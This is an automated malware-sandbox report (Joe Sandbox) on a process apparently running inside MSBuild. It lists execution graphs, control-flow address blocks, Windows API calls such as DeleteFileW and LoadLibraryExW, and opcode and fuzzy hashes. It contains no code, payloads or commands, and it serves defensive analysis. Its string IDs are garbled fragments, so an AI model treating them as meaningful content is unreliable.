                                                                                      execution_graph 37269 130d030 37270 130d048 37269->37270 37271 130d0a2 37270->37271 37276 675cc44 37270->37276 37285 675d9c8 37270->37285 37289 675e718 37270->37289 37298 675d9b7 37270->37298 37277 675cc4f 37276->37277 37278 675e789 37277->37278 37280 675e779 37277->37280 37318 675cd6c 37278->37318 37302 675e8b0 37280->37302 37307 675e8a0 37280->37307 37312 675e97c 37280->37312 37281 675e787 37281->37281 37286 675d9ee 37285->37286 37287 675cc44 CallWindowProcW 37286->37287 37288 675da0f 37287->37288 37288->37271 37292 675e755 37289->37292 37290 675e789 37291 675cd6c CallWindowProcW 37290->37291 37294 675e787 37291->37294 37292->37290 37293 675e779 37292->37293 37295 675e8b0 CallWindowProcW 37293->37295 37296 675e8a0 CallWindowProcW 37293->37296 37297 675e97c CallWindowProcW 37293->37297 37295->37294 37296->37294 37297->37294 37299 675d9c5 37298->37299 37300 675cc44 CallWindowProcW 37299->37300 37301 675da0f 37300->37301 37301->37271 37304 675e8c4 37302->37304 37303 675e950 37303->37281 37322 675e968 37304->37322 37325 675e958 37304->37325 37309 675e8b1 37307->37309 37308 675e950 37308->37281 37310 675e968 CallWindowProcW 37309->37310 37311 675e958 CallWindowProcW 37309->37311 37310->37308 37311->37308 37313 675e93a 37312->37313 37314 675e98a 37312->37314 37316 675e968 CallWindowProcW 37313->37316 37317 675e958 CallWindowProcW 37313->37317 37315 675e950 37315->37281 37316->37315 37317->37315 37319 675cd77 37318->37319 37320 675fe6a CallWindowProcW 37319->37320 37321 675fe19 37319->37321 37320->37321 37321->37281 37323 675e979 37322->37323 37329 675fda9 37322->37329 37323->37303 37326 675e968 37325->37326 37327 675fda9 CallWindowProcW 37326->37327 37328 675e979 37326->37328 37327->37328 37328->37303 37330 675cd6c CallWindowProcW 37329->37330 37331 675fdba 37330->37331 37331->37323 37338 1580848 37340 158084e 37338->37340 37339 158091b 37340->37339 37344 1581370 37340->37344 37348 6751d00 37340->37348 37352 6751cf0 37340->37352 37346 1581380 37344->37346 37345 1581484 37345->37340 37346->37345 37356 1587301 37346->37356 37349 6751d01 37348->37349 37361 67514d4 37349->37361 37353 6751d00 37352->37353 37354 67514d4 2 API calls 37353->37354 37355 6751d30 37354->37355 37355->37340 37357 158729c 37356->37357 37359 1587305 37356->37359 37358 15872a2 DeleteFileW 37357->37358 37357->37359 37360 15872cf 37358->37360 37359->37346 37360->37346 37362 67514da 37361->37362 37365 6752c2c 37362->37365 37364 67536b6 37364->37364 37367 6752c37 37365->37367 37366 6753ddc 37366->37364 37367->37366 37370 6755a60 37367->37370 37374 6755a50 37367->37374 37371 6755a81 37370->37371 37372 6755aa5 37371->37372 37378 6755c10 37371->37378 37372->37366 37376 6755a54 37374->37376 37375 6755aa5 37375->37366 37376->37375 37377 6755c10 2 API calls 37376->37377 37377->37375 37379 6755c1d 37378->37379 37380 6755c56 37379->37380 37382 675495c 37379->37382 37380->37372 37383 6754967 37382->37383 37385 6755cc8 37383->37385 37386 6754990 37383->37386 37385->37385 37387 675499b 37386->37387 37392 67549a0 37387->37392 37389 6755d37 37396 675af8c 37389->37396 37395 67549ab 37392->37395 37393 6756ed8 37393->37389 37394 6755a60 2 API calls 37394->37393 37395->37393 37395->37394 37397 6755d71 37396->37397 37398 675afa5 37396->37398 37397->37385 37403 675b1b6 37398->37403 37408 675b1c8 37398->37408 37412 675b1d8 37398->37412 37399 675afdd 37404 675b1bb 37403->37404 37405 675b1c3 37403->37405 37404->37399 37406 675b1de 37405->37406 37415 675b218 37405->37415 37406->37399 37409 675b1d8 37408->37409 37410 675b1de 37408->37410 37411 675b218 2 API calls 37409->37411 37410->37399 37411->37410 37414 675b218 2 API calls 37412->37414 37413 675b1e2 37413->37399 37414->37413 37416 675b21d 37415->37416 37417 675b25c 37416->37417 37421 675b4c0 LoadLibraryExW 37416->37421 37422 675b4b3 LoadLibraryExW 37416->37422 37417->37406 37418 675b460 GetModuleHandleW 37420 675b48d 37418->37420 37419 675b254 37419->37417 37419->37418 37420->37406 37421->37419 37422->37419 37332 6753050 DuplicateHandle 37333 67530e6 37332->37333 37334 675d810 37335 675d878 CreateWindowExW 37334->37335 37337 675d934 37335->37337 37423 678e680 37424 678e684 GlobalMemoryStatusEx 37423->37424 37426 678e6fe 37424->37426 37427 6752e08 37428 6752e4e GetCurrentProcess 37427->37428 37430 6752ea0 GetCurrentThread 37428->37430 37431 6752e99 37428->37431 37432 6752ed6 37430->37432 37433 6752edd GetCurrentProcess 37430->37433 37431->37430 37432->37433 37434 6752f13 37433->37434 37435 6752f3b GetCurrentThreadId 37434->37435 37436 6752f6c 37435->37436
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,btq
                                                                                      • API String ID: 0-3970051468
                                                                                      • Opcode ID: ffab143b8d9adbb4e2bcbdebb614418359d5d59326ae87e9079aaa8abca7186a
                                                                                      • Instruction ID: 4ffe085df4b1a3544dbe6baeb13dc6ef451664c52ab2a3c090effaec2d7d2919
                                                                                      • Opcode Fuzzy Hash: ffab143b8d9adbb4e2bcbdebb614418359d5d59326ae87e9079aaa8abca7186a
                                                                                      • Instruction Fuzzy Hash: F1331E31D1071A8EDB11EF68C8905ADF7B1FF99300F15C69AE449BB261EB70AAC5CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1637 6785ad8-6785af6 1638 6785af8-6785afb 1637->1638 1639 6785afd-6785b19 1638->1639 1640 6785b1e-6785b21 1638->1640 1639->1640 1641 6785b38-6785b3b 1640->1641 1642 6785b23-6785b31 1640->1642 1644 6785b48-6785b4b 1641->1644 1645 6785b3d-6785b47 1641->1645 1652 6785b7e-6785b94 1642->1652 1653 6785b33 1642->1653 1647 6785b6c-6785b6e 1644->1647 1648 6785b4d-6785b67 1644->1648 1649 6785b70 1647->1649 1650 6785b75-6785b78 1647->1650 1648->1647 1649->1650 1650->1638 1650->1652 1657 6785b9a-6785ba3 1652->1657 1658 6785daf-6785db9 1652->1658 1653->1641 1659 6785ba9-6785bc6 1657->1659 1660 6785dba-6785dc2 1657->1660 1671 6785d9c-6785da9 1659->1671 1672 6785bcc-6785bf4 1659->1672 1663 6785dca 1660->1663 1664 6785dc4-6785dc6 1660->1664 1667 6785dcb-6785dcc 1663->1667 1668 6785dd2-6785def 1663->1668 1665 6785dc8 1664->1665 1666 6785dce-6785dd1 1664->1666 1665->1663 1666->1668 1667->1666 1670 6785df1-6785df4 1668->1670 1674 6785dfa-6785e06 1670->1674 1675 6785ea7-6785eaa 1670->1675 1671->1657 1671->1658 1672->1671 1690 6785bfa-6785c03 1672->1690 1681 6785e11-6785e13 1674->1681 1677 6785eb0-6785ebf 1675->1677 1678 67860d6-67860d9 1675->1678 1691 6785ede-6785f19 1677->1691 1692 6785ec1-6785edc 1677->1692 1679 67860db-67860f7 1678->1679 1680 67860fc-67860fe 1678->1680 1679->1680 1684 6786100 1680->1684 1685 6786105-6786108 1680->1685 1686 6785e2b-6785e32 1681->1686 1687 6785e15-6785e1b 1681->1687 1684->1685 1685->1670 1694 678610e-6786117 1685->1694 1688 6785e43 1686->1688 1689 6785e34-6785e41 1686->1689 1695 6785e1d 1687->1695 1696 6785e1f-6785e21 1687->1696 1697 6785e48-6785e4a 1688->1697 1689->1697 1690->1660 1698 6785c09-6785c25 1690->1698 1705 67860aa-67860bf 1691->1705 1706 6785f1f-6785f30 1691->1706 1692->1691 1695->1686 1696->1686 1699 6785e4c-6785e4f 1697->1699 1700 6785e61-6785e9a 1697->1700 1708 6785d8a-6785d96 1698->1708 1709 6785c2b-6785c55 1698->1709 1699->1694 1700->1677 1725 6785e9c-6785ea6 1700->1725 1705->1678 1715 6786095-67860a4 1706->1715 1716 6785f36-6785f53 1706->1716 1708->1671 1708->1690 1726 6785c5b-6785c83 1709->1726 1727 6785d80-6785d85 1709->1727 1715->1705 1715->1706 1716->1715 1724 6785f59-678604f call 6784270 1716->1724 1776 678605d 1724->1776 1777 6786051-678605b 1724->1777 1726->1727 1733 6785c89-6785cb7 1726->1733 1727->1708 1733->1727 1738 6785cbd-6785cc6 1733->1738 1738->1727 1740 6785ccc-6785cfe 1738->1740 1747 6785d09-6785d25 1740->1747 1748 6785d00-6785d04 1740->1748 1747->1708 1751 6785d27-6785d7e call 6784270 1747->1751 1748->1727 1750 6785d06 1748->1750 1750->1747 1751->1708 1778 6786062-6786064 1776->1778 1777->1778 1778->1715 1779 6786066-678606b 1778->1779 1780 6786079 1779->1780 1781 678606d-6786077 1779->1781 1782 678607e-6786080 1780->1782 1781->1782 1782->1715 1783 6786082-678608e 1782->1783 1783->1715
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $]q$$]q
                                                                                      • API String ID: 0-127220927
                                                                                      • Opcode ID: 1e43f2a3c360bf625cc14f56fb386712d096a05b5fc141b12d67e5ffe966dbe6
                                                                                      • Instruction ID: 7ef0eb1d127ffeae8531833e14f03633fe33a665afab5a66eff685ccd8eac1b5
                                                                                      • Opcode Fuzzy Hash: 1e43f2a3c360bf625cc14f56fb386712d096a05b5fc141b12d67e5ffe966dbe6
                                                                                      • Instruction Fuzzy Hash: 4F02BF30B102059FDB95EF68D494A6EB7E2FF84304F248529D809EB394DB75EC46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e81e61d45002862420bf18a28619aa7d2b4d2cb8d578fbc3037990ce5ef47703
                                                                                      • Instruction ID: 1344bf7a2edbdeb71db7908511411e8168e3ad0ae1d100fe3f9841b5afa49128
                                                                                      • Opcode Fuzzy Hash: e81e61d45002862420bf18a28619aa7d2b4d2cb8d578fbc3037990ce5ef47703
                                                                                      • Instruction Fuzzy Hash: BE63E831D10B1A8EDB11EB68C8945ADF7B1FF99300F15C79AE4587B121EB70AAD4CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2432 678e118-678e12a 2433 678e12c-678e159 call 678d250 call 678d074 2432->2433 2434 678e18e-678e195 2432->2434 2441 678e15e-678e16b 2433->2441 2443 678e16d-678e186 2441->2443 2444 678e196-678e1fd 2441->2444 2443->2434 2454 678e1ff-678e201 2444->2454 2455 678e206-678e216 2444->2455 2456 678e4a5-678e4ac 2454->2456 2457 678e218 2455->2457 2458 678e21d-678e22d 2455->2458 2457->2456 2460 678e48c-678e49a 2458->2460 2461 678e233-678e241 2458->2461 2464 678e4ad-678e526 2460->2464 2466 678e49c-678e49e 2460->2466 2461->2464 2465 678e247 2461->2465 2465->2464 2467 678e2d8-678e2f9 2465->2467 2468 678e45c-678e47e 2465->2468 2469 678e2fe-678e31f 2465->2469 2470 678e43f-678e45a 2465->2470 2471 678e411-678e43d 2465->2471 2472 678e2b2-678e2d3 2465->2472 2473 678e377-678e39f 2465->2473 2474 678e34a-678e372 2465->2474 2475 678e28b-678e2ad 2465->2475 2476 678e24e-678e260 2465->2476 2477 678e480-678e48a 2465->2477 2478 678e324-678e345 2465->2478 2479 678e3a4-678e3e1 2465->2479 2480 678e265-678e286 2465->2480 2481 678e3e6-678e40c 2465->2481 2466->2456 2467->2456 2468->2456 2469->2456 2470->2456 2471->2456 2472->2456 2473->2456 2474->2456 2475->2456 2476->2456 2477->2456 2478->2456 2479->2456 2480->2456 2481->2456
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xaq$$]q
                                                                                      • API String ID: 0-1280934391
                                                                                      • Opcode ID: 7fbc28af8de66c81a6ecf602bc99831cb825d265dae440e9023738e9a7d6566c
                                                                                      • Instruction ID: cdae08b06d6e6941d67c7e3917ca43214e794a31e0cca6063a5100b1c397a338
                                                                                      • Opcode Fuzzy Hash: 7fbc28af8de66c81a6ecf602bc99831cb825d265dae440e9023738e9a7d6566c
                                                                                      • Instruction Fuzzy Hash: 5FB18274B002189FDB58EF79995467E7AA7BFC4720B05852DE40AE7388DE38CC06C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08831442c22941db324f86df4f2a82cd0ff9e9885e66a41ef202a5b74a23f1d6
                                                                                      • Instruction ID: 8689fba348654b03cd53d11616e2b67a6aeefbca97557b264622455417818ff5
                                                                                      • Opcode Fuzzy Hash: 08831442c22941db324f86df4f2a82cd0ff9e9885e66a41ef202a5b74a23f1d6
                                                                                      • Instruction Fuzzy Hash: 8B23E831D10B1A8ECB11EB68C8545ADF7B1FF99300F15C79AE458BB121EB70AAD5CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Vl
                                                                                      • API String ID: 0-682378881
                                                                                      • Opcode ID: 0d93742ec73fa18a84c3ca53b0701ff09841ac0dd0c3321d5eb582676dec855b
                                                                                      • Instruction ID: f47404d36f2995799a6b45b9810e5888c16a4b350220e771dae8ed62de56110d
                                                                                      • Opcode Fuzzy Hash: 0d93742ec73fa18a84c3ca53b0701ff09841ac0dd0c3321d5eb582676dec855b
                                                                                      • Instruction Fuzzy Hash: 36917170E0020ADFDF10EFA9C98179EBBF2BF88704F148529E815BB254DB749846CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ef9999817ab652ffeb18ac85451d901729d1cce0381b46b86d3074463fa4107
                                                                                      • Instruction ID: 17a8622bad140c1a9f1a4e3ffee99adc09554b432b428686550cbb223953431b
                                                                                      • Opcode Fuzzy Hash: 6ef9999817ab652ffeb18ac85451d901729d1cce0381b46b86d3074463fa4107
                                                                                      • Instruction Fuzzy Hash: E7629F34B402068FDB54EB68D594AADB7F2FF84314F248529D406EB398DBB5EC46CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2899243517.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6780000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 838eab64f0598a225d99ec39299c70e111b3d2e23a904122b4c45dcbe8d9ebc3
                                                                                      • Instruction ID: a6a2becc8652f67d9941d399c85c3e0f3af9412652dc6c98b93df9c34ba57b45
                                                                                      • Opcode Fuzzy Hash: 838eab64f0598a225d99ec39299c70e111b3d2e23a904122b4c45dcbe8d9ebc3
                                                                                      • Instruction Fuzzy Hash: E8226F70E502098FDFA4EB6CD4807BDB7B6EB85310F248926E509EB395DA39DC81CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60ea17049343a45d4b2d3cebd78174727b972af7d2e7b39214463d2f4ad6c43d
                                                                                      • Instruction ID: 2c6a75c9ba015d58472b8ece135c26e16c6d313f1928cd3b87f56f4e5087bdd5
                                                                                      • Opcode Fuzzy Hash: 60ea17049343a45d4b2d3cebd78174727b972af7d2e7b39214463d2f4ad6c43d
                                                                                      • Instruction Fuzzy Hash: 3FB12D70E0020A8FDF14DFA9D9857ADBBF2BF88354F148529D819FB254EB749885CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 657 6752e03-6752e97 GetCurrentProcess 661 6752ea0-6752ed4 GetCurrentThread 657->661 662 6752e99-6752e9f 657->662 663 6752ed6-6752edc 661->663 664 6752edd-6752f11 GetCurrentProcess 661->664 662->661 663->664 665 6752f13-6752f19 664->665 666 6752f1a-6752f35 call 6752fd8 664->666 665->666 670 6752f3b-6752f6a GetCurrentThreadId 666->670 671 6752f73-6752fd5 670->671 672 6752f6c-6752f72 670->672 672->671
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 06752E86
                                                                                      • GetCurrentThread.KERNEL32 ref: 06752EC3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 06752F00
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 06752F59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 8a757170c191753611556182a371b7f4a9019362f673836278d0fd5dceacb170
                                                                                      • Instruction ID: 39fc27cf4da06e5f85362e9bdbf9db252d11d955722152a4af2dd7e7794a0118
                                                                                      • Opcode Fuzzy Hash: 8a757170c191753611556182a371b7f4a9019362f673836278d0fd5dceacb170
                                                                                      • Instruction Fuzzy Hash: 455157B0D003098FDB54DFA9D948BAEBBF1FF48300F248569D419A7261D7789944CFA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 679 6752e08-6752e97 GetCurrentProcess 683 6752ea0-6752ed4 GetCurrentThread 679->683 684 6752e99-6752e9f 679->684 685 6752ed6-6752edc 683->685 686 6752edd-6752f11 GetCurrentProcess 683->686 684->683 685->686 687 6752f13-6752f19 686->687 688 6752f1a-6752f35 call 6752fd8 686->688 687->688 692 6752f3b-6752f6a GetCurrentThreadId 688->692 693 6752f73-6752fd5 692->693 694 6752f6c-6752f72 692->694 694->693
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 06752E86
                                                                                      • GetCurrentThread.KERNEL32 ref: 06752EC3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 06752F00
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 06752F59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 55ae69a1bd158c11f10a9074389f7f4cd10f237b552c9dff38c77d6eb7365231
                                                                                      • Instruction ID: d52234b4c7ee9ab225b2f6977a1a03490d897c12d49c5cce9183ce3d5470525f
                                                                                      • Opcode Fuzzy Hash: 55ae69a1bd158c11f10a9074389f7f4cd10f237b552c9dff38c77d6eb7365231
                                                                                      • Instruction Fuzzy Hash: 9C5157B09003098FDB54DFAAD548BAEBBF1FF88310F208569E419A7261D7786944CF66
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1146 1587301-1587302 1147 1587304 1146->1147 1148 1587305-1587306 1146->1148 1147->1148 1149 158729c-15872cd DeleteFileW 1147->1149 1150 1587308 1148->1150 1151 1587309-158730a 1148->1151 1157 15872cf-15872d5 1149->1157 1158 15872d6-15872fe 1149->1158 1150->1151 1152 158730c 1151->1152 1153 158730d-158730e 1151->1153 1152->1153 1155 1587310 1153->1155 1156 1587311-1587324 1153->1156 1155->1156 1159 1587326-1587329 1156->1159 1157->1158 1162 158732b-158733f 1159->1162 1163 158735c-158735f 1159->1163 1169 1587341-1587343 1162->1169 1170 1587345 1162->1170 1164 158736f-1587372 1163->1164 1165 1587361 1163->1165 1167 15873ae-15873b1 1164->1167 1168 1587374-15873a9 1164->1168 1188 1587361 call 1587caf 1165->1188 1189 1587361 call 1587cb0 1165->1189 1172 15873b3-15873ba 1167->1172 1173 15873c5-15873c7 1167->1173 1168->1167 1176 1587348-1587357 1169->1176 1170->1176 1171 1587367-158736a 1171->1164 1177 15873c0 1172->1177 1178 1587483-1587489 1172->1178 1174 15873c9 1173->1174 1175 15873ce-15873d1 1173->1175 1174->1175 1175->1159 1179 15873d7-15873e6 1175->1179 1176->1163 1177->1173 1182 15873e8-15873eb 1179->1182 1183 1587410-1587425 1179->1183 1185 15873f3-158740e 1182->1185 1183->1178 1185->1182 1185->1183 1188->1171 1189->1171
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015872C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2750557408.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_1580000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID: LR]q
                                                                                      • API String ID: 4033686569-3081347316
                                                                                      • Opcode ID: e31358a05e0a8e53895b07555817cf7c4bd5bf0b041def4bd1782ff35c74576e
                                                                                      • Instruction ID: bcf87874e97e06b07b69ec6c299c3aad639b0b7f1b5ec08bdcb16ec141a8278d
                                                                                      • Opcode Fuzzy Hash: e31358a05e0a8e53895b07555817cf7c4bd5bf0b041def4bd1782ff35c74576e
                                                                                      • Instruction Fuzzy Hash: 6541B170E1021A8FDB15EFA9C84579DBBB1FF89314F208929E805FB251DB749941CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0675B47E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: d62a46599cfe128473581da69c8ca8e85c1f2acf9a9fe832cb3ca126be21690e
                                                                                      • Instruction ID: a3efce7865e89bb65312844e7b182c3996aad1d42549dfa60581cdfe5de22877
                                                                                      • Opcode Fuzzy Hash: d62a46599cfe128473581da69c8ca8e85c1f2acf9a9fe832cb3ca126be21690e
                                                                                      • Instruction Fuzzy Hash: 2D816870A00B458FD7A4DF6AD45476ABBF1FF88704F008A6DD88AD7A50D7B4E849CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675D922
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 6e30f59e59fdb9fbb8e95c4987774b4d3cb32acc863a958c360a87ca581d055d
                                                                                      • Instruction ID: cb554600d7dcc8a3f012132faec9ac9eefd2d84289720682d74fede8b0611d42
                                                                                      • Opcode Fuzzy Hash: 6e30f59e59fdb9fbb8e95c4987774b4d3cb32acc863a958c360a87ca581d055d
                                                                                      • Instruction Fuzzy Hash: 4B51D2B0D003499FDB24CF99C884ADEBBB5FF48310F24856AE818AB210D775A881CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0675D922
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: 8c9daac88664770f318e89995b58ab0b5f38075402e9410dfb9eb7067582c388
                                                                                      • Instruction ID: 0e2e9005503ccb6173fe76bb679f088a31155876908ce6b9d65d8a4dd998ce73
                                                                                      • Opcode Fuzzy Hash: 8c9daac88664770f318e89995b58ab0b5f38075402e9410dfb9eb7067582c388
                                                                                      • Instruction Fuzzy Hash: 8441C1B1D003499FDB24CF99C884ADEBBB5FF48310F25826AE818AB210D775A945CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0675FE91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2714655100-0
                                                                                      • Opcode ID: 3a6c26e189fa89a2900780390fd52a7a91e9b911857fc1ee8b8142d39e9c394c
                                                                                      • Instruction ID: 7386fea2f241d883d1c672f9ac7c7b089c1bf0bb5cdb1ea166d9dc3849f32fab
                                                                                      • Opcode Fuzzy Hash: 3a6c26e189fa89a2900780390fd52a7a91e9b911857fc1ee8b8142d39e9c394c
                                                                                      • Instruction Fuzzy Hash: AA413AB4900309CFDB54DF99C488AAABBF5FF88314F25C499D519AB321D778A841CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067530D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2892732693.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_6750000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: ac1705e66955eed7fb57ecaf99f65e3b13c4759074edb07d8b2923233827faf2
                                                                                      • Instruction ID: 41575a37a21c7351b99a1cc41a6b344ac6a6322e765f4f3f92ea4ba178047405
                                                                                      • Opcode Fuzzy Hash: ac1705e66955eed7fb57ecaf99f65e3b13c4759074edb07d8b2923233827faf2
                                                                                      • Instruction Fuzzy Hash: B921E3B5D002489FDB10CF9AD584AEEBBF5FB48310F14855AE919A3350D379A940CFA1
                                                                                      Uniqueness

